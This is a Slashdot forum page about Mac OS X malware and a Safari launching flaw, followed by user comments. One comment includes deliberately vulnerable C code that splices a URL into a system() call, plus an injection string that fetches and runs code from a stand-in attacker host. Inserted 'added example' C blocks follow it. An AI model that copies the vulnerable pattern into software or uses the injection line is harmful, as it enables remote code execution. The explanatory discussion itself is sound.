Slashdot Mirror


Computer 'Worms' Turn on Macs

Carl Bialik from WSJ writes "Macs have been largely immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"

6 of 450 comments

  1. Immune? by east+coast · Score: 1, Interesting

    Macs have been largely immune to the viruses, worms and malware

    Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt too secure. Hopefully they will be able to cut this off at the quick, but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?

    --
    Dedicated Cthulhu Cultist since 4523 BC.
  2. Wired article re: Mac security by Kaimelar · Score: 4, Interesting
    A recent columnist at Wired said what I was thinking already:

    From the linked article:

    "These Mac security holes are a storm in a teacup. They've inspired hundreds of stories in the press and even the national network news, but if they were Windows holes, no one would have blinked.

    That's because holes in Windows are routine, business as usual, while it now appears the Mac is under attack thanks to Apple's brand-new high profile. But this isn't the case.

    Last month, there were four "massive" virus attacks on Windows, according to Commtouch, an antispam and antivirus vendor. Indeed, viruses are now so aggressive, they routinely outpace attempts by antivirus companies to distribute protective signatures.

    This state of affairs is now so common, I hadn't noticed -- and I work for a technology news site. "Virulent computer virus infects millions worldwide, other non-news at 11."

    These Mac "threats" are only news because of their novelty, not the threat level they pose."

  3. Re:Popularity decides if an OS is secure. by SpooForBrains · Score: 4, Interesting

    The only supporting argument for this oft-repeated fallacy is that Windows has the biggest market share and the biggest number of security holes.

    Far be it for me to shatter your little bubble, but Apache Web Server is more popular than IIS, and has significantly fewer critical exploits.

    God, it feels like Karma whoring just pointing out something so bloody obvious.

    --
    "The dew has clearly fallen with a particularly sickening thud this morning"
  4. It's a proliferation problem... by TCQuad · Score: 2, Interesting

    Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.

    All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.

    Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in their address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?

    In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.

    In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.
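    The two clusters described above, as an added simulation that is not part of TCQuad's post: 200 hosts (a constructed size), 5 random address-book contacts each, one Windows seed, and a worm that Mac hosts receive but never run. The Mac share is a parameter so the all-Windows and half-Mac cases can be compared directly.

```c
/* Added example, not from the thread: a small Monte Carlo model of TCQuad's
 * two clusters. Each host has 5 random contacts; a zero-day that only runs on
 * Windows spreads from one seed. Macs receive the mail but are never infected. */
#include <stdio.h>
#include <stdlib.h>

#define HOSTS    200   /* constructed cluster size */
#define CONTACTS 5

/* Run one outbreak. Returns the number of hosts infected once it dies out and
 * stores in *rounds how many send rounds (one e-mail burst per host) it took. */
int simulate(double mac_fraction, unsigned seed, int *rounds)
{
    int is_mac[HOSTS], infected[HOSTS], book[HOSTS][CONTACTS];
    int queue[HOSTS], head = 0, tail = 0, count = 1;
    srand(seed);  /* fixed seed so a run is reproducible */
    for (int i = 0; i < HOSTS; i++) {
        is_mac[i] = i < (int)(HOSTS * mac_fraction);  /* first share are Macs */
        infected[i] = 0;
        for (int c = 0; c < CONTACTS; c++)
            book[i][c] = rand() % HOSTS;  /* random contact; repeats allowed */
    }
    /* Patient zero is the last host, which is always a Windows machine. */
    queue[tail++] = HOSTS - 1;
    infected[HOSTS - 1] = 1;
    *rounds = 0;
    while (head < tail) {
        int level_end = tail;  /* everyone queued so far sends this round */
        (*rounds)++;
        while (head < level_end) {
            int h = queue[head++];
            for (int c = 0; c < CONTACTS; c++) {
                int t = book[h][c];
                if (is_mac[t] || infected[t]) continue;  /* dead end, or done */
                infected[t] = 1;
                queue[tail++] = t;
                count++;
            }
        }
    }
    return count;
}

int main(void)
{
    int r_all, r_mix;
    int all = simulate(0.0, 1, &r_all), mix = simulate(0.5, 1, &r_mix);
    printf("all Windows: %d/%d infected in %d rounds\n", all, HOSTS, r_all);
    printf("half Macs:   %d/%d infected in %d rounds\n", mix, HOSTS, r_mix);
    return 0;
}
```

    Because contacts are random, some hosts have nobody mailing them and stay clean even in the all-Windows cluster; the mixed cluster can never exceed the Windows half, and the Windows hosts it does reach are fewer because half of every burst lands on a Mac.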

  5. Re:Faulty reporting by Anonymous Coward · Score: 1, Interesting
    1. Mac OS 9 does not run on Motorola processors. The newest Mac OS that a 68040 will run is 8.1. The newest you can put on a 68000 is 7.5.5 or possibly 7.6.
    2. Why do you say Linux will be next? (Well first of all, there are already worms that target Linux boxes, but if you run a recent distro and have secure passwords/key-based SSH auth you are fine. The SSH brute force worms could also in theory affect Mac OS X.) But Mac OS X has a larger consumer install base. By the way, does Mac OS X have a non-executable stack by default yet? I recently discovered that recent Linux kernels do, as well as randomized stack positions. That goes a loooong way in preventing buffer overflows.
  6. Old security hole, shared by Windows & Firefox by argent · Score: 2, Interesting
    Among the signs: two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack.

    The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...

    The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.

    This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static void panic(const char *msg) { perror(msg); exit(1); }

    /* Deliberately insecure, as described below: the URL is spliced into a shell command. */
    void run_application_on_url(char *app, char *url)
    {
      char *buffer = malloc(strlen(app)+strlen(url)+6);
      if(!buffer) panic("Out of memory on malloc");   /* the post tested *buffer, which dereferences NULL */
      sprintf(buffer, "%s \"%s\" &", app, url);
      system(buffer);                                  /* /bin/sh parses whatever url contained */
      free(buffer);
    }
    That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http : //badguy.xx/exploitcode>/tmp/...;sh /tmp/..." .

    Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.

    What's safe?

    Well, there are two options.

    1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.

    2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.

    Here are some options that have been tried and don't work:

    1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).

    2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).

    3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).

    So far Apple's tried two of these, let's hope they don't try the third.

    * Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
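    The posted helper beside the form argent's option 1 amounts to (call the viewer directly, never through a shell), as an added example that is not argent's code: `build_shell_command` only builds the string the original would hand to `system()` so the injection is visible, and `run_application_on_url_safe` passes the URL as a single `argv` element via `execvp`. The viewer name `true` and the hostile URL are constructed stand-ins.

```c
/* Added example, not argent's code: the posted pattern beside a form that
 * never hands the URL to a shell, so ';' and '"' in it are inert bytes. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The posted pattern: the URL is spliced into a command line for /bin/sh to
 * parse. Built and returned, not run, so the reader can see what sh gets. */
char *build_shell_command(const char *app, const char *url)
{
    size_t n = strlen(app) + strlen(url) + 6;
    char *buffer = malloc(n);
    if (!buffer) return NULL;
    snprintf(buffer, n, "%s \"%s\" &", app, url);
    return buffer;
}

/* Hardened form: fork and execvp the viewer with argv = {app, url}. No shell
 * is involved, so the URL arrives verbatim as argv[1]. Returns the viewer's
 * exit status, or -1 if it could not be started. (The original backgrounded
 * the viewer with '&'; waiting keeps the result checkable.) A URL starting
 * with '-' may still be read as an option: reject it, or pass "--" first
 * when the viewer accepts that. */
int run_application_on_url_safe(const char *app, const char *url)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)app, (char *)url, NULL };
        execvp(app, argv);
        _exit(127);  /* exec failed: report like a shell would */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *url = "benign.pdf\";echo injected;\"";  /* constructed hostile URL */
    char *cmd = build_shell_command("viewer", url);
    printf("shell would run: %s\n", cmd);  /* 'echo injected' became a command */
    free(cmd);
    /* "true" stands in for the viewer: it exits 0 and ignores its argument. */
    printf("safe exec status: %d\n", run_application_on_url_safe("true", url));
    return 0;
}
```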